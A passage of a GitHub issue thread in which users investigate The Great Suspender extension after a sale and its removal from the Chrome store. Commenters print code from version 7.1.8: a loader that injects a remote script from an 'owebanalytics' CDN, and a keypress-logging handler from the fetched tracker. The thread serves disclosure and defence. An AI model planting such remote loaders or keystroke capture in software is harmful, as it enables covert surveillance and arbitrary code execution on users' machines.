text-right"> 👍<span class="ml-2 mr-3">24</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>@matt-kruse </p> <blockquote> <p>there are NO good actors who purchase extensions<br /> It's a business model that doesn't work</p> </blockquote> <p>Rapportive was <a rel="nofollow noopener" target="_blank" href="https://techcrunch.com/2012/02/22/rapportive-linkedin-acquisition/">purchased</a> by Linkedin for $15M.</p> <p>I could imagine a productivity service buying this extension for its user base.</p> <p>However, yes, it probably wouldn't be anonymous (unless the purchaser is a stealth mode startup, which is however not when acquisitions happen).</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1618344?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="egorvinogradov picture"> <strong>egorvinogradov</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong> great, you just forgot to mention one small thing - <strong>who</strong> did you sell it to? Users of your (well, not anymore) product would really like to know how "trusted" the new maintainer really is. Hard to know that when they're completely anonymous...</p> <p>Also, stating that the best thing to happen is for the maintainer to just get the extension back in store is also quite suspicious. Anyone who knows a thing or two about internet security will absolutely not install the extension again until this "accident" is cleared up by the new maintainer. Recovering your tabs can be done much more securely.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3606072?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Destroy666x picture"> <strong>Destroy666x</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong>, everyone is free to sell their creation, and you aren't responsible for something you had nothing to do with. It's a shame that this project has become tarnished in recent events, but I appreciate you appearing here and making a statement about it.</p> <p>Questions: Did the transfer of ownership in any way involve this GitHub project? Can you personally confirm that the last version here (7.1.6) is free from any interference from that transfer of ownership?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7757052?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michealespinola picture"> <strong>michealespinola</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Despite the shit storm we're going through right now, the "new owners" of TGS have yet to say a single <strong>WORD</strong> to the public. There has been ZERO communication since "they" took over control of the project back in June 2020. Why the fuck is <strong>@deanoemcke</strong> still defending and representing them <strong>AFTER</strong> the sale?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1860472?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="sarog picture"> <strong>sarog</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">14</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Argh, got a system-wide install of 7.1.6 pulled out of a backup and working again... then Chromium remembered another version of it was malware and disabled it on me :(</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@honestbleeps</strong> Google's messaging has been nonexistent: everything described in the top post is based on observable facts about the extension itself.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@themageking</strong> I'm talking about their labeling it "malware" in the pop-up. </p> <p>You're absolutely right their messaging otherwise is nonexistent which is, in my mind, unforgivable. </p> <p>I'll edit my comment to clarify! I was replying on mobile and had accidentally submitted prior to finishing my comment.</p> <p>Edit: on review there is a lot more information than I had last read several hours ago and some of it makes my prior speculative comment moot so I've deleted it. Thanks for all the research and updates you've provided so far!</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/323763?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="honestbleeps picture"> <strong>honestbleeps</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Yea, <strong>@sarog</strong> , I usually don't like theories wthout proof, but you kind of pushed me into writing my thought - this honestly seems like the author just had no idea what to do and decided to try some "trickery" anonymously himself, no 3rd party involved.</p> <p>"The maintainer is aware of the situation and is trying to get the extension back into the store" right into "Only the current maintainer knows the motivations behind these actions. I had had no contact with them since the transfer until recently" sounds really off since in point number 1 I see confidence about the "maintainer's" intent to get a non-malicious product back into the store, yet in point number 2 you're saying you just contacted them and have no idea about their motivation. Could be just bad wording or stress, but together with the fact that you don't want to say who the new maintainer is or at least explain why you can't say that (some kind of NDA?) it's very weird.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3606072?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Destroy666x picture"> <strong>Destroy666x</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Argh, got a system-wide install of 7.1.6 pulled out of a backup and working again... then Chromium remembered another version of it was malware and disabled it on me :(</p> </blockquote> <p>You can't use a backed up version from the chrome store... the manifest file has an update url in and as soon as chrome checks for updates it'll recognize it and disable. But honestly, I would recommend utilizing a different route rather than running an unpacked extension if you didn't know this. As soon as Manifest V3 becomes mandatory, this version will fail to stop working anyway. See some of the posts from prior to todays date where a number of good alternatives were discussed.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>@michealespinola</p> <blockquote> <p>everyone is free to sell their creation, and you aren't responsible for something you had nothing to do with. It's a shame that this project has become tarnished in recent events</p> </blockquote> <p>Ridiculous. If they sell a creation that is able to be automatically updated without users receiving any notice about this transaction, or having any information on which to base their decision to continue allowing that creation to run on their computers, the original creator is <em>absolutely</em> responsible for what comes after.</p> <p>Apparently, there has been this concern around for <em>months</em> now. But I, and many others, are only just being made aware of <em>any</em> of it thanks to Google's pulling of the extension. That's many months of software from an author I had no knowledge of or chance to vet was running on my machine.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6212837?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="jimcullenaus picture"> <strong>jimcullenaus</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Despite the shit storm we're going through right now, the "new owners" of TGS have yet to say a single <strong>WORD</strong> to the public. There has been ZERO communication since "they" took over control of the project back in June 2020. Why the fuck is <strong>@deanoemcke</strong> still defending and representing them <strong>AFTER</strong> the sale?</p> </blockquote> <p>I can't speak to why he's defending them... I don't think he owes it to them or us to do that... AFAIC he did his part announcing the sale... In retrospect it would have been nice if he had published an update to the chrome store that pushed an announcement message to users (as many likely never looked at GH), but I blame Google/Chrome Store more for this process.</p> <p><strong>@deanoemcke</strong> I'm not a lawyer, but given the situation, in my lay-person's mind, it would seemingly be a good idea to not defend or speculate about anything that occurred after the sale. Guessing if there was something nefarious going on it may make you look complicit or whatever. Disclaimer again: I'm not a lawyer nor providing legal advice, just my personal opinion.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@honestbleeps</strong> </p> <blockquote> <p>It's entirely likely / plausible that Google is calling this "malware" and it's may or may not be anything we'd traditionally call malware. Could be as simple as analytics.</p> </blockquote> <p>Ah yes, another one of those run of the mill analytics sites which has the CentOS homepage. Classic.<br /> I love those analytics services which have no way to sign up or see your analytics results.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Seems like a looooot of extra work if youre just trying to downgrade... wouldn't it just be easier to copy the database to the new extension?</p> </blockquote> <p>No. Unfortunately, It doesn't work.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/16253859?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="agiudiceandrea picture"> <strong>agiudiceandrea</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>EDIT: CORRECTION: As <strong>@ne0phyte</strong> has pointed out, only 'trackpageView' is enabled, but it's possible for the loaded JavaScript to be swapped arbitrarily.</p> <p>It looks like the version 7.1.8 will, for me at least, log keypresses. Maybe I'm reading it wrong, but this appears to pull and run a JS file.</p> <p>From the <a rel="nofollow noopener" target="_blank" href="https://robwu.nl/crxviewer/crxviewer.html?crx=https%3A%2F%2Fwww.crx4chrome.com%2Fgo.php%3Fp%3D221789%26s%3D0%26l%3Dhttps%253A%252F%252Fclients2.googleusercontent.com%252Fcrx%252Fblobs%252FQgAAAC6zw0qH2DJtnXe8Z7rUJP0w4lDJ_bL6-4cEiO2dNd4wrSGFFOdFphokRztdPsQowUaOdWUtinT5tZeRv1Vf900oTts08327-tk8a_WqaBFZAMZSmuXCYMppUJZfV9giRXbSZIQVQDpezA%252Fextension_7_1_8_0.crx">archived link above</a>. (Thank you!)</p> <pre><code class="prettyprint">var owa_baseUrl = 'https://cdn.owebanalytics.com/'; var owa_cmds = owa_cmds || []; function loadOpenWebAnalytics(version) { owa_cmds.push(['trackPageView']); (function() { var _owa = document.createElement('script'); _owa.type = 'text/javascript'; _owa.async = true; _owa.src = owa_baseUrl + 'owa/modules/base/js/owa.tracker-combined-latest.minified.js?siteId=klbibkeccnjlkjkiokjodocebajanakg&apikey=2cf3d852ab70d359456ce3a0aac237a3&v=' + version; var _owa_s = document.getElementsByTagName('script')[0]; _owa_s.parentNode.insertBefore(_owa, _owa_s); })(); } </code></pre> <p>I pulled the file myself and unminified it. It logs a few things, including this:</p> <pre><code class="prettyprint"> keypressEventHandler: function(e) { e = e || window.event; var targ = this._getTarget(e); if (targ.tagName === "INPUT" && targ.type === "password") { return; } var key_code = e.keyCode ? e.keyCode : e.charCode; var key_value = String.fromCharCode(key_code); var event = new OWA.event(); event.setEventType("dom.keypress"); event.set("key_value", key_value); event.set("key_code", key_code); event.set("dom_element_name", targ.name); event.set("dom_element_value", targ.value); event.set("dom_element_id", targ.id); event.set("dom_element_tag", targ.tagName); this.addToEventQueue(event); }, </code></pre> <p><strong>Seems like it's trying not to log passwords</strong>, but if you've got other keypresses that you're inserting or have a website without a field that uses both input tags and password type, it might log them. It doesn't log 100% of the dom actions necessarily -- that's configurable with <code>logDomStreamPercentage</code>, but defaults to 100%. :(</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2160055?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="JosephCatrambone picture"> <strong>JosephCatrambone</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">7</span> 🚀<span class="ml-2 mr-3">2</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>FWIW: In recent months I noticed a lot of image and video loading (massive lag) issues on reddit. These issues disappeared after removing the latest version of the extension (that was pulled from the app store). These issues also did not and do not exist in the last "real" version 7.1.6.</p> </blockquote> <p>I have experienced the same thing on some online movie sites. Maybe it isn't linked and just this particular cdn wasn't available at this moment. But this coincidence is still suspicious.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/64647195?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="JesusAtheist picture"> <strong>JesusAtheist</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>It's really depressing that Dean lost the motivation and passion to continue development of this extension, especially when it wasn't making money. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/51363864?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Poopooracoocoo picture"> <strong>Poopooracoocoo</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I'd like to thank any and everyone who participated in the investigation, please keep us updated with any new information.<br /> especially if anyone found data leaked from/by this extension's owners.</p> <p>and we hope that google/google-chrome doesn't just auto-update extensions without notifying users or giving the user the option to control which extension can be auto-updated or not.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2970978?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="KhogaEslam picture"> <strong>KhogaEslam</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">13</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong> lets make this simple: who is the new maintainer.</p> <p>That’s the ONLY way to build trust now. Otherwise nobody is ever going to trust you again because tbh, you fucked it up pretty badly and if you’re refusing to say who it is. Your reputation is only going to get burned more.</p> <p>Everybody here is waking up to the possibility of a MASSIVE DATA EXFILTRATION attempt and who you decided to sell to is responsible for that.</p> <p>So, who is the new owner</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/827996?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="christhomas picture"> <strong>christhomas</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">13</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>owa/modules/base/js/owa.tracker-combined-latest.minified.js?siteId=klbibkeccnjlkjkiokjodocebajanakg&apikey=2cf3d852ab70d359456ce3a0aac237a3&v=</p> </blockquote> <p>Interesting... ran it through Prettier and uploaded it to pastebin in case anyone else wants to take a peek... <a rel="nofollow noopener" target="_blank" href="https://pastebin.com/nvjgpsEm">https://pastebin.com/nvjgpsEm</a></p> <p>Unfortunately no way to know if this is the file that was being served in the past or if there are "countermeasures" to serve different files in different circumstances... but the majority of the code does look harmless... the only thing I see that isn't cool is this (just a quick skim definitely nothing comprehensive so there may be more)...</p> <p><code>addTransaction: function (order_id, order_source, total, tax, shipping, gateway, city, state, country) { this.ecommerce_transaction = new OWA.event(); this.ecommerce_transaction.setEventType("ecommerce.transaction"); this.ecommerce_transaction.set("ct_order_id", order_id); this.ecommerce_transaction.set("ct_order_source", order_source); this.ecommerce_transaction.set("ct_total", total); this.ecommerce_transaction.set("ct_tax", tax); this.ecommerce_transaction.set("ct_shipping", shipping); this.ecommerce_transaction.set("ct_gateway", gateway); this.ecommerce_transaction.set("page_url", this.getCurrentUrl()); this.ecommerce_transaction.set("city", city); this.ecommerce_transaction.set("state", state); this.ecommerce_transaction.set("country", country); OWA.debug("setting up ecommerce transaction"); this.ecommerce_transaction.set("ct_line_items", []); OWA.debug("completed setting up ecommerce transaction"); }, addTransactionLineItem: function (order_id, sku, product_name, category, unit_price, quantity) { if (!this.ecommerce_transaction) { this.addTransaction("none set"); } var li = {}; li.li_order_id = order_id; li.li_sku = sku; li.li_product_name = product_name; li.li_category = category; li.li_unit_price = unit_price; li.li_quantity = quantity; var items = this.ecommerce_transaction.get("ct_line_items"); items.push(li); this.ecommerce_transaction.set("ct_line_items", items); }, trackTransaction: function () { if (this.ecommerce_transaction) { this.trackEvent(this.ecommerce_transaction); this.ecommerce_transaction = ""; } },</code></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>This really is nano defender all over again, seriously, what is it with the smartest open source devs, making the most fucking dipshit transfer decisions. </p> <p>This just proves that, if any project changes ownership, abandon ship till the new owners are proven trustworthy.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/65789901?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Darkwolf1515 picture"> <strong>Darkwolf1515</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">11</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I literally installed the extension a few hours before this</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70191184?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="DestroyerXyz picture"> <strong>DestroyerXyz</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Like <strong>@minig0d</strong> mentioned currently the loaded script is not harmful anymore it is literally just a combination of polyfills and OWA version 1.6.2</p> <p>To be precious it is:<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/includes/json2.js">https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/includes/json2.js</a><br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/includes/lazyload-2.0.min.js">https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/includes/lazyload-2.0.min.js</a><br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/owa.js">https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/owa.js</a><br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/owa.tracker.js">https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/1.6.2/modules/base/js/owa.tracker.js</a></p> <p>This basically means <strong>@JosephCatrambone</strong> report about logging keypress events is just OWA's doing and the <code>addTransaction</code> from <strong>@minig0d</strong> too.</p> <p>Overall it is just a standard tracker but we don't know what was behind the script before it was removed from the google chrome store unless someone downloaded it before or knows how to get it from some chrome cache or something</p> <p>Edit:<br /> There were three different domains since november:<br /> cdn.owebanalytics.com<br /> cddn.owebanalytics.com<br /> trk.owebanalytics.com</p> <p>Currently <code>cdn</code> and <code>cddn</code> have the same script. <code>trk</code> is a 404 page von FeatherJs, I didn't find anything there</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/20294042?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="MrWook picture"> <strong>MrWook</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>This really is nano defender all over again, seriously, what is it with the smartest open source devs, making the most fucking dipshit transfer decisions.</p> <p>This just proves that, if any project changes ownership, abandon ship till the new owners are proven trustworthy.</p> </blockquote> <p><strong>@Darkwolf1515</strong> Its about money everyone needs to eat nothing greedy about it. I do not judge him for that I do judge him for lying about it.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/19692962?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="spacecabbie picture"> <strong>spacecabbie</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">8</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>So sad to hear this. Such a shameful ending for one of the famous Chromium based open-source projects.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/44023416?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="smith558 picture"> <strong>smith558</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Following from <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-760600299, it looks like all 6 extensions that contained the same fake tracking code have now been removed from the store. In addition to those 6, I was keeping track of 4 other suspicious extensions, 2 of which have been removed.</p> <p>Reading <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-773662150, I wouldn’t be surprised if this was the store starting to pull extensions that don’t use Manifest V3, but this is just speculation.</p> <hr /> <p>Manifest V3 looks like a massive improvement for extensions’ security, making it <a rel="nofollow noopener" target="_blank" href="https://developer.chrome.com/docs/extensions/mv3/intro/mv3-migration/#remotely-hosted-code">impossible for extensions to use remotely hosted code</a>. There’ll still be some room to hide for extensions that use remote APIs, but much less than there is now.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/877585?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="thibaudcolas picture"> <strong>thibaudcolas</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Apologies if off topic however would using a local PiHole, or the like, curtail these possible misdemeanors? To elaborate. If this is going to be a continuing problem (obfuscated code, lack of communication, skeptical findings that may evade standard policy), then is it not merely a CDN (*.$domain) that needs blocking?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6066121?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Icep1ck picture"> <strong>Icep1ck</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>This really is nano defender all over again, seriously, what is it with the smartest open source devs, making the most fucking dipshit transfer decisions.</p> </blockquote> <blockquote> <p></p> </blockquote> <blockquote> <p>This just proves that, if any project changes ownership, abandon ship till the new owners are proven trustworthy.</p> </blockquote> <p><strong>@Darkwolf1515</strong> Its about money everyone needs to eat nothing greedy about it. I do not judge him for that I do judge him for lying about it.</p> </blockquote> <p>So if I sold off your accounts to whoever, you'd be ok cause I "gotta eat" right?</p> <p>Just cause you need money doesn't mean you put others at risk, unbelievable.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/65789901?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Darkwolf1515 picture"> <strong>Darkwolf1515</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">9</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>I don't have any tabs in my history to test this on... but this may help someone without installing any extensions... if you don't understand JS or know what DevTools is please use the extension routes mentioned above...</p> <p>Step 1: go to <a rel="nofollow noopener" target="_blank" href="chrome://history/">chrome://history/</a><br /> Step 2: type/paste the following into the search box: chrome-<a rel="nofollow noopener" target="_blank" href="extension://klbibkeccnjlkjkiokjodocebajanakg">extension://klbibkeccnjlkjkiokjodocebajanakg</a><br /> Step 3: Run the following to load some helper functions (minimized/compressed version of the <a rel="nofollow noopener" target="_blank" href="https://github.com/Georgegriff/query-selector-shadow-dom">query-selector-shadow-dom</a> functions)<br /> <code>function querySelectorAllDeep(selector,root=document,allElements=null){return _querySelectorDeep(selector,!0,root,allElements)}function querySelectorDeep(selector,root=document,allElements=null){return _querySelectorDeep(selector,!1,root,allElements)}function _querySelectorDeep(selector,findMany,root,allElements=null){selector=normalizeSelector(selector);let lightElement=root.querySelector(selector);if(document.head.createShadowRoot||document.head.attachShadow){if(!findMany&&lightElement)return lightElement;const selectionsToMake=splitByCharacterUnlessQuoted(selector,",");return selectionsToMake.reduce((acc,minimalSelector)=>{if(!findMany&&acc)return acc;const splitSelector=splitByCharacterUnlessQuoted(minimalSelector.replace(/^\s+/g,"").replace(/\s*([>+~]+)\s*/g,"$1")," ").filter(entry=>!!entry).map(entry=>splitByCharacterUnlessQuoted(entry,">")),possibleElementsIndex=splitSelector.length-1,lastSplitPart=splitSelector[possibleElementsIndex][splitSelector[possibleElementsIndex].length-1],possibleElements=collectAllElementsDeep(lastSplitPart,root,allElements),findElements=findMatchingElement(splitSelector,possibleElementsIndex,root);return findMany?acc=acc.concat(possibleElements.filter(findElements)):(acc=possibleElements.find(findElements))||null},findMany?[]:null)}return findMany?root.querySelectorAll(selector):lightElement}function findMatchingElement(splitSelector,possibleElementsIndex,root){return element=>{let position=possibleElementsIndex,parent=element,foundElement=!1;for(;parent&&!isDocumentNode(parent);){let foundMatch=!0;if(1===splitSelector[position].length)foundMatch=parent.matches(splitSelector[position]);else{const reversedParts=[].concat(splitSelector[position]).reverse();let newParent=parent;for(const part of reversedParts){if(!newParent||!newParent.matches(part)){foundMatch=!1;break}newParent=findParentOrHost(newParent,root)}}if(foundMatch&&0===position){foundElement=!0;break}foundMatch&&position--,parent=findParentOrHost(parent,root)}return foundElement}}function splitByCharacterUnlessQuoted(selector,character){return selector.match(/\\?.|^$/g).reduce((p,c)=>('"'!==c||p.sQuote?"'"!==c||p.quote?p.quote||p.sQuote||c!==character?p.a[p.a.length-1]+=c:p.a.push(""):(p.sQuote^=1,p.a[p.a.length-1]+=c):(p.quote^=1,p.a[p.a.length-1]+=c),p),{a:[""]}).a}function isDocumentNode(node){return node.nodeType===Node.DOCUMENT_FRAGMENT_NODE||node.nodeType===Node.DOCUMENT_NODE}function findParentOrHost(element,root){const parentNode=element.parentNode;return parentNode&&parentNode.host&&11===parentNode.nodeType?parentNode.host:parentNode===root?null:parentNode}function collectAllElementsDeep(selector=null,root,cachedElements=null){let allElements=[];if(cachedElements)allElements=cachedElements;else{const findAllElements=function(nodes){for(let i=0,el;el=nodes[i];++i)allElements.push(el),el.shadowRoot&&findAllElements(el.shadowRoot.querySelectorAll("*"))};root.shadowRoot&&findAllElements(root.shadowRoot.querySelectorAll("*")),findAllElements(root.querySelectorAll("*"))}return allElements.filter(el=>el.matches(selector))}function normalizeSelector(sel){function saveUnmatched(){unmatched&&(tokens.length>0&&/^[~+>]$/.test(tokens[tokens.length-1])&&tokens.push(" "),tokens.push(unmatched))}var 